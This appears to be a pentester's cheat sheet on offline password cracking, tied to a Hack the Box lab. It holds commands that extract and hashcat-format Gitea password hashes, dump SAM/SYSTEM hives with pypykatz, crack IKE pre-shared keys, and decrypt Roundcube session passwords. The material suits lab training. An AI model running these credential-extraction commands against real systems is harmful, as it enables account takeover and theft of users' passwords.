# **Basic Information** # **Offline Password Cracking** ## **Gitea Database** ```bash # extract usernames and passwords sqlite3 gitea.db sqlite> .tables sqlite> .schema user sqlite> .mode line sqlite> select * from user; # one liner to extract usernames and passwords sqlite3 gitea.db "select passwd,salt,name from user" | while read data; do digest=$(echo "$data" | cut -d'|' -f1 | xxd -r -p | base64); salt=$(echo "$data" | cut -d'|' -f2 | xxd -r -p | base64); name=$(echo $data | cut -d'|' -f 3); echo "${name}:sha256:50000:${salt}:${digest}"; done | tee gitea.hashes cat gitea.hashes | cut -d ":" -f2- | tee hashcat_gitea.hashes # crack hashes hashcat hashcat_gitea.hashes rockyou.txt ``` ## **SAM & SYSTEM Hives** ```bash pypykatz registry --sam sam system ``` ## **IKE Pre-Shared Key** ```bash ike-scan -P -M -A -n <fake_id> --pskcrack=hash.txt <target_ip> psk-crack -d rockyou.txt hashes.txt ``` ## **Roundcube - Decrypt Password From Session-Vars** - The Roundcube application will store session information in a MySQL database. If this database is accessible then the user's triple DES encrypted password can be extracted and decrypted if the `des_key` is known. To decrypt the password, do the following: 1. Base64 decode `password` from the `mysql` instance 2. Convert output to hex 3. Split the hex into the IV and cipher text. For DES-EDE3-CBC, the first 8 bytes is the IV and the remainder is the cipher text 4. Use Cyberchef to decrypt the cipher text by specifying the IV, key, mode, and input format 5. ... 6. Profit # **Services** ## **FTP** ```bash ``` ## **SSH** ```bash ``` # **References** # **Practical Application** | Platform | Name | Notes | | ------------ | ------------ | ----- | | Hack the Box | [[Outbound]] | |